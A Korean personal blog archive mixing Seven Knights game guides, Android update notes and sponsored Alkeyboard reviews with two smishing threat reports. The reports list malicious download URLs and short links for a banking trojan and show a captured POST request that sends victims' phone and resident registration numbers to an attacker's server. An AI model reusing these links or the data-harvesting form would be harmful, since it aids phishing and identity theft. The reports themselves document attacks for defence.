'모바일'에 해당되는 글 88건




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ


"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 요일 던전이다. 

월요일 극악 난이도는 위에 보이듯이 쥬피, 아리엘, 헤브니아, 헬레니아, 에반 영웅으로 이루어져 있으며, 

클리어시 땅 4성 원소를 획득 가능하다.



이번 상대방 영웅에서 조심해야 할 점을 알아보겠습니다.


쥬피는 조심해야할 건 없고, 매턴마다 쥬피가 저격자세를 취해주면 떙큐죠 ㅎㅎㅎ


아리엘도 크게 문제는 없습니다.

하지만 패시브가 치확 확률업이라~ ㅠㅠ 

먼저 죽이는게 좋습니다. 물몸이라 죽이기도 쉽구요 ㅎㅎㅎ



월요일 던전에서 가장 어려운 상대;;

패시브가 3턴 면역이라 관통으로 죽여야 하는 ㅠㅠ

그리고 스킬 중 3턴감이 있어서 무섭습니다^^; 



헬레니아는 도발스킬이 시전되면, 아주 껄끄러운 상대입니다.

만약 도발스킬이 문제라면 에이스의 전체공격으로 해제할 수 있습니다!!



에반은 리메이크 되고 나서 좀 까다로워졌죠;;

특히 돌격은 상대방을 기절시킬 수 있으니 ㅠㅠ

마찬가지고 방어막을 펼치면 에이스의 전체공격으로 해제 후에 때려주시면 편해요



플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!






덱은 제이브 보진 // 소교, 아일린, 에이스, 델론즈 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!

(예전에 찍어둔거라....장비들이 좀 구리네요 ㅋㅋㅋㅋㅋ 영웅레벨도 낮고 ㅠㅠ)









스킬트리는 아래와 같습니다.


1 라운드 : 제이브 용분으로 마무리

(제이브 용분으로 1마리도 못죽인다면 ㅠㅠ 현덱으로는 깨기 어려움)


2 라운드 : 제이브 분격으로 2~3마리 잡고, 델론즈 침묵 스킬 "사신강림"으로 헤브니아, 헬레니아, 에반등을 침묵,

           그리고 소교 3인 관으로 마무리

           (분격은 관통계열이라 헤브니아가 죽으면 참 좋습니다 ㅋㅋ)


3 라운드 : 제이브 용분으로 2~3마리 잡고, 델론즈 침묵 스킬 "사신강림" 으로 침묵, 그리고 제이브 분격으로 마무리


※ 소교 3인 관통 스킬은 상황에 따라 적적하게 사용하세요, 제이브 스킬이 치명이 많이 터지면 그냥 죽이는 수도 있으니^^



위 내용을 간략하게 정리 해드리겠습니다.


1라 : 제이브 용분 -> 마무리

2라 : 제이브 분격 -> 델론즈 침묵 -> 소교 관통 -> 마무리

3라 : 제이브 용분 -> 델론즈 침묵 -> 제이브 분격 -> 소교 관통 -> 마무리


오늘도 참 쉽죠~!!?




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ


"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 요일 던전이다. 

금요일 극악 난이도는 위에 보이듯이 소이, 무송, 링링 영웅으로 이루어져 있으며, 클리어시 불 4성 원소를 획득 가능하다.


목요일 던전처럼 파스칼로 깨면 쉽지 않나 싶기도 하지만, 파스칼은 1명씩 나오는 요일에만 용이하기 때문에 ㅠㅠ


그럼 이번 상대방 영웅에서 조심해야 할 점을 알아보겠습니다.


소이는 전체공격 방어가 있기 때문에 5인 공격영웅은 의미가 없습니다.


무송은 가장 무서운 전체 기절 스킬을 주의해야합니다.

그렇다고 스파이크를 데려가기에는 극공덱이름이 아깝죠 ㅠㅠ


링링은 크게 조심해야 할 건 없지만 3인스킬이 꽤나 아픕니다.

그래서 면역케릭을 데리고 가면 좀 편하죠^^



플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!






덱은 비담 보진 // 소교, 델론즈, 에이스, 아일린 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!




스킬트리는 아래와 같습니다.


1 라운드 : 비담의 극속공으로 1~2마리는 잡고 비담 3인스킬 "거궁신포" 로 마무리


2 라운드 : 상대방의 속공격을 견디고, 바로 비담의 4인 스킬 " 태전포화"로 마무리

(상대영웅 중 무송의 "기절" 스킬을 비담이 맞았을 경우에는 다시 하는게 정신건강 상 이로움;;;)


3 라운드 : 상대방의 속공격을 견디고, 바로 델론즈 침묵 스킬 "사신강림"으로 침묵 시켜두고 

           돌아오는 비담의 3인 스킬 "거궁신포"로 마무리



위 내용을 간략하게 정리 해드리겠습니다.


1라 : 비담 속속 -> 비담 3인 스킬 -> 마무리

2라 : 비담 4인 스킬 -> 마무리

3라 : 델론즈 침묵 -> 비담 3인 스킬 -> 마무리


오늘도 참 쉽죠~!!?







블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 게임 유명 게임회사인 넷마블게임즈에서 개발한 모바일 액션 RPG 게임 "세븐나이츠"의 컨텐츠 중의 

하나 인 요일 던전에 대해서 공략을 해보려 한다.


우선 요일던전이란건 월,화,수,목,금,토,일 에 해당하는 던전이다.

각 요일마다, 쉬움, 보통, 어려움, 극악의 난이도를 선택 하여 클리어 시 원하는 원소를 획득 할 수 있는 컨텐츠 이다.



물론 보상은 각각 다르다.

쉬움 난이도에서는 1성 원소

보통 난이도에서는 2성 원소

어려움 난이도에서는 3성 원소

극악 난이도에서는 4성 원소를 획득 할 수 있다.


보편적으로 세븐나이츠를 시작하고 약 2주일 정도면, 어려움까지는 무리없이 깰 수 있지만

극악 던전은 어느정도 덱(파티)가 꾸려져야 할 수 있기 때문에 최대한 쉬운 방법으로 다들 극악 난이도를 

클리어하려고 난리다 ㅠㅠ



"내가 공략하는 방법이 정답은 아니다.
다만, 쉽게 할 수 있는 방법도 모를 수 있는 분들이 있기에 방법을 제시하는 것이기 때문에 태글 걸지 말자!!"



오늘 공략 할 던전은 바로 목요일 던전이다. 

목요일 극악 난이도는 위에 보이듯이 조커, 세인, 손오공 영웅으로 이루어져 있으며, 클리어시 암흑 4성 원소를 획득 가능하다.


플스는 아래와 같이 공격형 형식으로 선택을 했다.

게임에서 정해주는 "공격형 설정" 은 아니니 헷갈리지 말길~!!





덱은 파스칼 보진 // 여포, 태오, 에이스, 델론즈 로 구성했습니다.

영웅 별 렙은 아래 써있으니 패스하도록 하자~!!




스킬트리는 아래와 같습니다.


1 라운드(조커) : 파스칼 치명 속속으로 조커가 죽는 경우가 많습니다.
(만약 죽지 않는다면, 에이스나 델론즈의 단타 스킬로 죽이면 됩니다.)

2 라운드(세인) : 2라가 시작되면 세인이 선타를 가져가고, 여포에게 공격을 합니다.
이후 턴이 오면, 여포 "적토질풍격" 턴감 스킬로 세인의 면역을 해제 시킨 후에 파스칼 "파괴의 거인" 으로 마무리

3 라운드(손오공) : 3라가 시작되면 손오공이 먼저 2인 이나 3인을 먼저 쓰게 되는데, 2인을 쓰게 되면 운이 좋은겁니다.
이후 턴이 오면, 파스칼 "어둠의 문"으로 스킬을 재장전 후 바로 "파괴의 거인" 으로 마무리

3 라운드(손오공 부활 후) : 손오공이 부활 후 스킬을 쓰면 에이스, 델론즈는 대부분 죽을 겁니다.
신경쓰지 마시고, 태오의 "흑익 만월참" 턴감 스킬로 손오공 분신들 제거
그리고, 스칼 "어둠의 문"으로 스킬을 재장전 후 바로 "파괴의 거인" 으로 마무리


위 내용을 간략하게 정리 해드리겠습니다.


1라 : 파스칼 속속 -> 마무리


2라 : 여포 턴감 스킬 -> 파스칼 거인 스킬 -> 마무리


3라 : 파스칼 면역 스킬 -> 파스칼 거인 스킬 -> 마무리

3라 (손오공 부활 후 ) : 태오 턴감 스킬 -> 파스칼 면역 스킬 -> 파스칼 거인 스킬 -> 마무리







블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




9월달에 확인 된 스미싱 문자 중에서 "사용자 정보(통신사,휴대전화번호,주민등록번호)"를 입력해야 악성 어플리케이션이 다운로드 

되는 경우가 확인되었다.


이전에 소개했던 캡챠 코드(CAPTCHA)를 이용한 유포 방식과 비슷한 양상이다.

보안업체 및 스미싱 탐지 어플리케이션을 우회하려고 의도적으로 만든 것이다.


그래도 이렇게 꾸준하게 변하는 애들은 그나마 보안업체 및 스미싱 탐지 어플리케이션을 신경쓰고 있다는 것이니 기분은 나쁘지 않다.

(니놈들 때문에 우리도 꾸준히 성장한다!!)


아래의 내용은 실제 스미싱 문자를 수신받은 문자 내용이다.

- 임OO귀하의 민사소송건이 접수되었으니 확인바랍니다. http://me2.do/GXo9B5RL

 ㄴ http://me2.do/GXo9B5RL

 ㄴ http://police.cq.co.kr/

 ㄴ http://police.cq.co.kr/file998.php

 ㄴ http://police.cq.co.kr/autonum.php

 ㄴ http://police.cq.co.kr/010-1111-1111/android..apk (입력한 전화번호가 폴더로 생성되며 이후 APK 파일을 다운로드)


※ 현재는 링크가 모두 차단되어 Full URL 공개!!



경찰청에서도 해당 스미싱 유포에 대해 공지를 하였다.


실제 사이트에 접속을 하면 아래와 같이 "서울지방경찰청"을 사칭하였으며, 사용자에게 "통신사, 휴대전화번호, 주민등록번호"

등을 기재하게 만든다.




모든 기재가 완료 되면, 사용자에게 android..apk 파일을 떨궈 준다.



사용자가 입력 한 정보는 제작자가 만들어 둔 autonum.php 서버로 전달 된다.

POST /autonum.php HTTP/1.1

Host: police.cq.co.kr

Connection: keep-alive

Content-Length: 67

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://police.cq.co.kr

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://police.cq.co.kr/file998.php

Accept-Encoding: gzip,deflate

Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,und;q=0.2


tel=skt&tel2=010&tel2-1=1111&tel2-2=1111&card1=880303&card2=1112568



실제 다운로드 된 악성 어플리케이션 android..apk 는  알약 안드로이드에서 "Trojan.Android.KRBanker" 로 탐지 하고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




지난 7월 22일부터 유병언 관련 스미싱 문구를 유포 중인 트위터를 관찰 중이다.


해당 트위터는 유병언 관련 스미싱 문구뿐만 아니라, 이슈가 되는 내용에 따라 문구를 바꾸고 있다.

하지만 주요 문구는 유병언과 관련 된 문구가 대다수 이다.


또한 기자들을 사칭하여 사용자들의 클릭을 유도하기도 하며,

최근에는 유병언 비서라고 사칭하기도 하였다.




아래는 해당 트위터에 대한 히스토리 내역이다.

- 최초 유포 트위터 히스토리


2014-07-22 : 김민숙 기자 사칭

ㄴ 주소지변경된후의 새로운 모바일지도 다운받어보세요 http://985.so/aHHZ 

ㄴ 안재욱, 미국서 병원비만 5억…“의료 민영화의 산 증인” http://985.so/aHHZ 

ㄴ 이병언 비밀금고 유서확인 영상 공개 http://is.gd/WkbkDt 

ㄴ 유병언 비밀금고에서 유서확인 비공개영상입니다 다운받고 세상에 알려 주세요http://t.cn/RPyeVwB 



2014-07-23 : KBS이해선 기사 사칭

ㄴ 유병언 비밀금고 공개  http://url.cn/ItTKAt 

ㄴ [ 유병언 ] 알고보니 암살 http://url.cn/ItTKAt 

ㄴ 유병언 암살 유병언에 관한 모든것 영상으로 담아봣어요  http://url.cn/ItTKAt 

ㄴ [ 유병언 금고 ]    비공개 영상입니다 다운받어보세요 http://985.so/aJrT



2014-07-24 : 유병언 비서 사칭

ㄴ [ 유병언 금고 ] 비공개영상입니다 다운받어보세요http://url.cn/ItTKAt

ㄴ [ 유병언 비밀금고 공개 ] 비공개영상입니다 다운받어보세요http://is.gd/KdwrPG

ㄴ [ 유병언] 비밀장부를 공개합니다 다운받어보세요 http://is.gd/KdwrPG




※ 항상 오전 4~ 6시 사이에 트윗을 올리고 있으며, 7월 24일 이후 새로운 트윗은 없는 상태이다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





안드로이드 킷캣 4.4.2의 업데이트가 갤럭시S4 제품에도 반영되었다.

실제로는 2014년 2월인가, 3월쯤 나온거 같은데.... 여태 난 업데이트 목록이 안나와있었다 ㅠㅠ


그래서 6월 3일 업데이트하였는데, 업데이트 포스팅을 거의 2달만에 한다;;

(뭐가 그리 바쁜지 ㅡ.ㅡ;; 맨날 잊어버리고 사는거 같다!!)


그럼 지금부터 갤럭시 S4로 킷캣 4.4.2 업데이트 방법과 추가 된 기능들이 무엇인지 알아보자!

1. 업그레이드 방법 

- KIES(Samsung Kies) : 삼성 전용 백업/복원/업그레이드 PC프로그램

- FOTA(Firmware Over The Air) : 설정 - 디바이스정보 - 소프트웨어 업그레이드


2. 변동사항 

- 안드로이드 4.4.2 킷캣 탑재

- 상단바 투명화 

- 잠금모드 음악 재생시 앨범이미지 사용

- 행아웃 메시지 정식 사용

- 문자 메시지 이모티콘 추가

- 삼성 프린트 서비스 플러그인 

- S헬스 설정 변경 

- 음성녹음 SNS 공유기능 추가 

- 홈스크린 위젯 변경 

- 크롬 브라우저 개발자 모드 삭제 

- 이메일 설정 변경 

- S노트 편집 모드 변경 

- 이메일 번역 서비스 변경 

- NFC 설정 변경

- 위치 설정 추가

- 메뉴 설정 변경 

- 환경설정 내 런처설정 메뉴 추가

- 알림창 위치 변경 

- 보안성 강화 


시간이 많이 없어서 모든 변동사항에 대한 설명은 제외한다.

다만, 사용자가 체감 할 수 있는 정도만 간단하게 설명하겠다.


첫번째, 상단바 아이콘의 색상이 모두 "화이트"로 통일되었다.

젤리빈(좌)과 킷캣(우)의 사진을 아래와 같이 보면 쉽게 이해할 수 있다.

젤리빈에서는 상단바 아이콘들이 색상을 띄고 있었지만, 킷캣에서는 모두 화이트로 통일되었다.

(개인적으로는 색상이 있는게 좋았는데...)

 


두번째, 음악재생 시 잠금화면에 앨범이미지를 사용하고 있다.

이 기능은, 멜론 및 알송에서도 지원하고 있던 내용이였다.

이제야 기본 운영체제 내용으로 반영 되었다.



※ 지금까지 사용해본 결과, 젤리빈과 크게 차이가 없어 보인다 ㅠㅠ

 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





※ 해당 포스팅은 리뷰 이벤트에 참여하기 위해 작성한 글임을 미리 알려드립니다.



이번에 소개할 제품은 이스트소프트의 자랑거리인 알툴즈에서 최신에 공개한 알키보드(Alkeyboard) 어플리케이션이다.


2014년 스마트폰을 사용하는 사용자들이 점점 늘어남에 따라 기본적인 삼성, LG, 팬턴 등 다양한 자기들만의 키보드를 고집한다.

이에 알툴즈는 사용자가 직접 커스텀 마이징이 가능한 알키보드를 선보여 사용자들에게 인기를 얻고 있다.



□ 알키보드와 관련 된 내용


그래서 처리의 블로그에서는 알키보드에 대한 리뷰를 시작하려 한다.

리뷰는 총 5단계로 진행 될 예정이다.

리뷰 1 - 설치방법 및 CPU 점유량

리뷰 2 - 주요기능 및 설정

리뷰 3 - 알키보드 사용 예시(SNS, 메일, 문서, 게임)

리뷰 4 - 삼성 키보드와 비교

리뷰 5 - 알키보드의 장,단점


※ 현재 알키보드는 안드로이드용으로만 출시되었으며, iOS 버전은 추후 되지 않을까 싶다.

(iOS에서 키보드 배경을 바꾸기 위해서 탈옥을 해야 하나?! 기억이 잘 안난다;;)



벌써 알키보드 리뷰의 마지막 단계 "알키보드의 장/단점"을 이야기 할 때가 왔다.

지금까지 리뷰를 작성하면서 불편했던 점, 또는 수정해야 하는 점들을 주관적인 입장에서 적어보았다.



- 장점 

1. 써야할 문자들이 한눈에 보여져서 찾기 편하다.

ㄴ 역시 알키보드가 내세우는 기능이지 않나 싶다.


2. 많은 이모티콘들을 지원한다.

ㄴ 삼성 키보드도 이모티콘을 지원하긴 하지만, 종류가 다양하진 않다


3. 키보드에 알록달록 색상이 들어가 밋밋한 기본 키보드보다는 이쁘다.

ㄴ 역시 알키보드가 내세우는 기능이다. 화사한 키보드는 개개인의 만족도를 높일 수 있다.


4. 레이아웃 설정을 통해 내 손에 맞는 키보드를 설정할 수 있다.

ㄴ 손이 큰 사람, 손이 작은 사람도 모두 만족하며 나만의 키보드 크기를 만들 수 있다.


5. 제조사가 달라도 동일한 키보드를 쓸 수 있다.

ㄴ 핸드폰이 바뀌어도 난 예전 핸드폰의 키보드를 사용할 수 있다는게 엄청 편하다.


6. 가로모드 분할 키보드(두벌식과 단모음에서 좌/우 분할 배치)

ㄴ 이건 정말 좋은 기능이다. 스마트폰보다는 타블릿쪽에서 편하게 쓸 수 있을 듯 하다


7. 키보드 종류를 설정 후 바로 테스트를 해 볼 수 있는 옵션

ㄴ 알키보드에서는 사용자가 사용 할 키보드 종류를 미리 테스트 해보고 설정할 수 있기 때문에 시간을 절약할 수 있다.



- 단점 

1. 키 누를 떄 진동 / 소리 / 팝업 옵션에서 진동세기와 소리크기를 수정할 때 드래그 불편

ㄴ 드래그로 하다보니 너무 작거나, 너무 크거나 조절이 어려웠다.

    보안점으로 단계별로 클릭점을 만들어 두던가, 클릭으로 수정이 가능하게 만들면 될 듯 하다


2. 오타가 많이 생김

ㄴ 알키보드가 오타를 방지하는 기능이 주 기능이기도 한데, 정확한 이유는 잘 모르겠다.

    어찌됬건 내가 사용할 때에는 삼성 키보드보다 오타가 많으건 사실이다.

    (리뷰 4에서 이야기했던 문구 분석을 정확히 판단하지 못하는 이유 때문이지 않을까 생각한다)


3. 테마의 다양성 부족

ㄴ 어차피 테마를 설정할 거였으면, 사용자의 커스텀마이징까지 신경을 써줫으면 좋겠다. 

    난 아이언맨으로 키보드 화면을 만들고 싶다!!


4. 예측 키의 크기 변경 기능

ㄴ 예측 키라는게 사용자의 눈에 좀 잘 띄어야 하는데 별로 티가 안난다.

    좀 더 크게 알려주거나 옵션으로 팝업 크기를 조절 하면 어떻까 싶다.


5. 전화 시 키보드 변경 안됨

ㄴ 스마트폰을 쓰면서 가장 많이 쓰고 있는 기능이 바로 전화화면이 아닐까 싶다.

    삼성 단말기이기 때문에 어쩌면 당연할 걸 수도 있겠지만, 전화 키패드는 변경이 되지 않았다.



이로써, 5단계의 알키보드 리뷰가 모두 마무리 되었다.


리뷰를 쓰다보니 좋은 점도 있었고, 불편한 점도 존재했던 건 사실이다.

하지만, 그래도 쓰다보면 편리한 앱 인것은 확실하다!!





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





※ 해당 포스팅은 리뷰 이벤트에 참여하기 위해 작성한 글임을 미리 알려드립니다.



이번에 소개할 제품은 이스트소프트의 자랑거리인 알툴즈에서 최신에 공개한 알키보드(Alkeyboard) 어플리케이션이다.


2014년 스마트폰을 사용하는 사용자들이 점점 늘어남에 따라 기본적인 삼성, LG, 팬턴 등 다양한 자기들만의 키보드를 고집한다.

이에 알툴즈는 사용자가 직접 커스텀 마이징이 가능한 알키보드를 선보여 사용자들에게 인기를 얻고 있다.



□ 알키보드와 관련 된 내용


그래서 처리의 블로그에서는 알키보드에 대한 리뷰를 시작하려 한다.

리뷰는 총 5단계로 진행 될 예정이다.

리뷰 1 - 설치방법 및 CPU 점유량

리뷰 2 - 주요기능 및 설정

리뷰 3 - 알키보드 사용 예시(SNS, 메일, 문서, 게임)

리뷰 4 - 삼성 키보드와 비교

리뷰 5 - 알키보드의 장,단점


※ 현재 알키보드는 안드로이드용으로만 출시되었으며, iOS 버전은 추후 되지 않을까 싶다.

(iOS에서 키보드 배경을 바꾸기 위해서 탈옥을 해야 하나?! 기억이 잘 안난다;;)



알키보드에 대한 기능설명은 대충 마무리가 된 듯 하다.

그렇다면 삼성 단말기에서 기본적으로 제공하는 삼성 키보드와 알키보드와는 어떻게!! 무엇이!! 틀린지 한번 알아보자.



- 삼성키보드 vs 알키보드 CPU 사용량 비교

CPU 사용량은 S노트를 이용하여 지정 된 문구를 타이핑 했을 시, 알키보드와 삼성 키보드와의 CPU 사용량을 비교해 보았다.


확인 결과, 삼성 키보드는 "알키보드 테스트" 를 타이핑 시 약 메모리 88MB 정도를 점유하고 있다.

 

반대로 알키보드는 메모리 33MB 정도 점유하고 있는 것으로 확인되었다.

그만큼, 삼성 기본 키보드와의 메모리도 1/2 정도 가볍게 사용 할 수 있다.

 



- 삼성키보드 vs 알키보드 디자인 비교

삼성 키보드는 쿼티, 천지인, 천지인 플러스, 베가, 나랏글 까지 총 5가지 키보드 종류를 제공한다.

 

 

 


알키보드는 "리뷰 2 - 주요기능 및 설정" 에 소개한 대로 총 7개의 키보드를 제공하고 있다.

두벌식, 단모음, 두벌식 + 단모음, 천지인, 천지인 플러스, 베가(스카이), 나랏글, 가로모드 분할 키보드

(※ 알키보드의 디자인은 [제품소개] 알키보드(Alkeyboard), 리뷰 2 - 주요기능 및 설정 에서 소개 했기 때문에 넘어감!!)




- 삼성키보드 vs 알키보드 오타 처리 기능

삼성 키보드와 알키보드와의 오타를 처리하는 기능에 대해 알아보았다.

테스트 방법은 오타가 나기 쉬운 문구를 타이핑하여 오타를 얼마나 정상적인 문구로 수정할 수 있는지이다.


(테스트문구)

"가녀ㅡ" 이렇게 오타가 났을 때 "" 만 지우고 ""받침을 써서 "가녕" 이라는 문구를 쓸 때 각각 키보드에서는??



삼성키보드에서는 "가녕"이라고 정상적인 문구로 수정을 해준다.

 


알키보드는 "가녀ㅇ" 이라고 최종 표기되며 문구를 정확히 수정하지 못했다.

 



- 삼성키보드 vs 알키보드 자주쓰는 문구 비교

자주쓰는 문구는 키보드를 사용하는데 있어, 아주 편한 기능이다.

이에 삼성키보드와 알키보드는 어떻게 다른지 알아보자.


삼성 키보드에서는 자주쓰는 문구가 쿼티(두벌식), 천지인 키보드에서 모두 표기를 해주고 있다.

 


알키보드에서는 알키보드 홈페이지에 나와있듯이 "두벌식, 단모음" 만 표기 된다.

정확하게 말하면, 두벌식, 단모음에도 자주 쓰는 문구는 표기되지 않았다.

(아마 그 이유는 알키보드를 사용해서 많이 써야하는데 아직 데이터베이스가 쌓이지 않아서 일까 싶다)

 


이번 포스팅에서는 삼성 키보드와 알키보드의 비교를 대상으로 포스팅 하였다.

다음 포스팅에서는 알키보드의 장, 단점에 대해 비교 정리를 해보자.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





※ 해당 포스팅은 리뷰 이벤트에 참여하기 위해 작성한 글임을 미리 알려드립니다.



이번에 소개할 제품은 이스트소프트의 자랑거리인 알툴즈에서 최신에 공개한 알키보드(Alkeyboard) 어플리케이션이다.


2014년 스마트폰을 사용하는 사용자들이 점점 늘어남에 따라 기본적인 삼성, LG, 팬턴 등 다양한 자기들만의 키보드를 고집한다.

이에 알툴즈는 사용자가 직접 커스텀 마이징이 가능한 알키보드를 선보여 사용자들에게 인기를 얻고 있다.



□ 알키보드와 관련 된 내용


그래서 처리의 블로그에서는 알키보드에 대한 리뷰를 시작하려 한다.

리뷰는 총 5단계로 진행 될 예정이다.

리뷰 1 - 설치방법 및 CPU 점유량

리뷰 2 - 주요기능 및 설정

리뷰 3 - 알키보드 사용 예시(SNS, 메일, 문서, 게임)

리뷰 4 - 삼성 키보드와 비교

리뷰 5 - 알키보드의 장,단점


※ 현재 알키보드는 안드로이드용으로만 출시되었으며, iOS 버전은 추후 되지 않을까 싶다.

(iOS에서 키보드 배경을 바꾸기 위해서 탈옥을 해야 하나?! 기억이 잘 안난다;;)


이전 포스팅들에서 설치와 기능에 대해 알아보았다.

그럼 이제 알키보드를 직접 사용 해 보는 일만 남은 것 같다.


알키보드를 이용해서 SNS, 메일발송, 문서작성, 게임등 다양한 앱 사용 시 활용 할 수 있는지 보자.


- SNS(Social Networking Service)

우리가 많이 사용하고 있는 SNS의 대표적인 앱으로 페이스북, 트위터 등을 뽑을 수 있다.

그럼 알키보드로 이런 SNS 앱을 사용 시 불편하지 않게 사용 할 수 있는지 보자.


아래의 그림에서 왼쪽은 삼성 키보드로 입력했을 때이고, 우측은 알키보드로 입력한 그림이다.

그림에서도 보이듯이 페이스북이나 트위터를 사용할 때에도 특수문자나 사용구를 자유롭게 쓸 수 있어 편리하다.

 

 


- 메일(E-Mail)

스마트폰을 사용하고 나서 부터 메일을 데스크탑보다는 스마트폰을 많이 사용한다.

알키보드를 사용하면서도 이전과 같이 불편함은 느껴지지 않는다.

 



- 문서(Document, Blog)

보통 스마트폰으로 문서를 작성하는 일은 거의 없지않나 싶지만, 문서 뿐만 아니라 블로그를 운영하는 사용자라면

사진을 찍고 바로 스마트폰에서 블로그 포스팅을 하는 경우는 많다.


그래서 문서는 "Microsoft Office Mobile" 앱으로 블로그는 "티스토리 - TISTORY" 앱으로 한번 글을 써보았다.


아래 그림에서 왼쪽은 엑셀, 우측은 워드에서 작성한 내용이다.

 


"티스토리 - TISTORY" 앱으로 작성을 해도 키보드 불편은 전혀 느껴지지 않는다^^

앱이 불편하면 불편했지;; 알키보드로는 불편함을 느끼지 못했다!!

 


- 게임(Game)

게임을 하면서는 알키보드를 사용할 일은 보편적으로 없다.

그래도 필요한 게임들이 있어서 (주)파티게임즈사의 "아이러브커피" 와 CJ E&M 사의 "모드의 마블 for KaKao" 를 대상으로 사용해 보았다.


알키보드를 사용해도 게임상에 화면을 가리거나 화면이 깨지거나 그런 문제는 전혀 없다.



이번 포스팅은 좀 짧은 것 같다;;

암튼, 알키보드는 어떤 앱을 사용하든 불편없이 사용자가 사용할 수 있도록 잘 만들어진 키보드앱이다!!


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





※ 해당 포스팅은 리뷰 이벤트에 참여하기 위해 작성한 글임을 미리 알려드립니다.



이번에 소개할 제품은 이스트소프트의 자랑거리인 알툴즈에서 최신에 공개한 알키보드(Alkeyboard) 어플리케이션이다.


2014년 스마트폰을 사용하는 사용자들이 점점 늘어남에 따라 기본적인 삼성, LG, 팬턴 등 다양한 자기들만의 키보드를 고집한다.

이에 알툴즈는 사용자가 직접 커스텀 마이징이 가능한 알키보드를 선보여 사용자들에게 인기를 얻고 있다.



□ 알키보드와 관련 된 내용


그래서 처리의 블로그에서는 알키보드에 대한 리뷰를 시작하려 한다.

리뷰는 총 5단계로 진행 될 예정이다.

리뷰 1 - 설치방법 및 CPU 점유량

리뷰 2 - 주요기능 및 설정

리뷰 3 - 알키보드 사용 예시(SNS, 메일, 문서, 게임)

리뷰 4 - 삼성 키보드와 비교

리뷰 5 - 알키보드의 장,단점


※ 현재 알키보드는 안드로이드용으로만 출시되었으며, iOS 버전은 추후 되지 않을까 싶다.

(iOS에서 키보드 배경을 바꾸기 위해서 탈옥을 해야 하나?! 기억이 잘 안난다;;)



이전 포스팅에서 설치를 완료 하였으니, 이번에는 알키보드의 주요기능과 설정에 대해서 알아보자.


알키보드의 주요기능은 크게 4가지 키보드, 테마, 확장성, 설정으로 구분지을 수 있다.

이름이 알.키.보.드 인만큼, 키보드에 대한 기능이 가장 많다.


- 키보드 기능

키보드는 우선 가로모드세로모드가로모드 분할 키보드(두벌식과 단모음에서 좌/우 분할 배치)로 분류된다.

가로모드와 세로모드에서는 두벌식, 단모음, 두벌식 + 단모음, 천지인, 천지인 플러스, 베가(스카이), 나랏글 과 같이 

총 7개의 키보드 종류로 구성되어 있다.


가로모드와 세로모드는 모두 동일한 키보드 종류를 가지고 있다.
 


하지만, 가로모드 분할 키보드(두벌식과 단모음에서 좌/우 분할 배치)는 조금 다르게 키보드를 셋팅 된다.

이건 정말 스마트폰이 아닌 데스크탑 키보드 같은 분위기다!!



그럼 이제 각 키보드별 모양새를 좀 알아보자.


* 두벌식 키보드

두벌식 키보드는 스마트폰에서 가장 기본이 되는 키보드다.


* 단모음 키보드

두벌식 키보드와는 달리 단모음만 표기되는 키보드(사실 많이 쓰이지는 않는다)


* 두벌식 + 단모음

각각의 장점을 모아둔 키보드


* 천지인

삼성에서 만든 천지인 키보드, 현재 가장 많이 쓰이는 키보드 중 하나


* 천지인 플러스

